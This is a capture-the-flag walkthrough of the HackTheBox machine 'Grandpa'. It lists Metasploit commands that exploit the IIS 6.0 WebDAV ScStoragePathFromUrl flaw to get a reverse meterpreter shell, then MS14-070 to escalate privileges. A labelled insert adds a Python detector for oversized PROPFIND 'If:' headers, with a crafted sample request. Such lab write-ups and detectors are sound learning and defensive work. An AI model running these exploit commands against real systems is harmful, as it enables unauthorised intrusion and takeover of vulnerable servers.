Grandpa — HackTheBox
Hello guys, this is a walkthrough for ‘Grandpa’ from ‘hackthebox’.
Whenever I get a machine, I always start with enumerating the target machine using the following ‘nmap’ command:
nmap -sV -O -F --version-light 10.10.10.14
Now we know that Microsoft IIS httpd 6.0 is running on port 80. On visiting the website
Hmm… The website looks like it is under construction. I tried using wfuzz, but nothing worked. So, I googled ‘Microsoft IIS httpd 6.0 exploits’ and got this.
Then, I opened msfconsole and used the following commands:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS 10.10.10.14
set LHOST <Your IP>
run
The module worked and I got a meterpreter shell. However, I couldn’t get anything out of it because the current user didn’t have enough privileges. I tried to escalate, but nothing gave me the permissions.
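On the defender's side, the module name above points at the ScStoragePathFromUrl code path in IIS 6.0 WebDAV, which is reached by a PROPFIND request carrying an oversized ‘If:’ header. The following Python check is an added example, not part of the original walkthrough: it flags that request shape in raw HTTP requests. The length threshold, the function names and both sample requests are assumptions constructed for illustration.

```python
import re

# Assumed threshold: a normal WebDAV "If" header (resource tag + lock token)
# is roughly 100 bytes; tune against your own traffic.
MAX_IF_HEADER_LEN = 300
RESOURCE_TAG = re.compile(rb"<https?://[^>]*>")

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, {lower-case header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers

def inspect(raw: bytes):
    """Return the reasons a request looks like an If-header overflow attempt."""
    method, headers = parse_request(raw)
    if_hdr = headers.get(b"if")
    if method != b"PROPFIND" or if_hdr is None:
        return []
    reasons = []
    if len(if_hdr) > MAX_IF_HEADER_LEN:
        reasons.append(f"If header is {len(if_hdr)} bytes")
    longest = max((len(m) for m in RESOURCE_TAG.findall(if_hdr)), default=0)
    if longest > MAX_IF_HEADER_LEN // 2:
        reasons.append(f"resource tag of {longest} bytes")
    if any(b < 0x20 or b > 0x7e for b in if_hdr):
        reasons.append("non-printable or non-ASCII bytes in If header")
    return reasons

# Constructed sample requests (not captured traffic).
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: intranet.example\r\nDepth: 1\r\n"
          b"If: <http://intranet.example/docs/a.txt> "
          b"(<opaquelocktoken:f81d4fae-7dec-11d0-a765-00a0c91e6bf6>)\r\n\r\n")
SUSPICIOUS = (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
              b"If: <http://localhost/" + b"A" * 400 + b"> (<http://localhost/"
              + b"B" * 400 + b">)\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect(req) or "clean")
```

IIS 6.0 does not log the ‘If:’ header by default, so this kind of check belongs on a proxy, WAF or packet capture in front of the server.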
After a while, I tried to figure out a program that was running as both the superuser and the current user for escalating the privilege. But luck didn’t favour me. On listing all the processes using ‘ps’, I found that some processes were owned by the ‘NT AUTHORITY\NETWORK SERVICE’ user and I was running under ‘rundll32.exe’, which had no user ownership. Therefore, I migrated to ‘davcdata.exe’.
After finishing the migration, I thought I’d use ‘post/multi/recon/local_exploit_suggester’ to find more exploits for the current session.
I ran the module on session 1 and got 6 exploits. Then, I started trying the third exploit, ‘exploit/windows/local/ms14_070_tcpip_ioctl’, and it helped me to elevate the privileges. I used the following commands:
use exploit/windows/local/ms14_070_tcpip_ioctl
show options
set session <your session number>
set lhost <your ip>
set lport <your port>
run
I got the user flag from C:\Documents and Settings\Harry\Desktop\user.txt and the root flag from C:\Documents and Settings\Administrator\Desktop\root.txt.
Thanks for the read.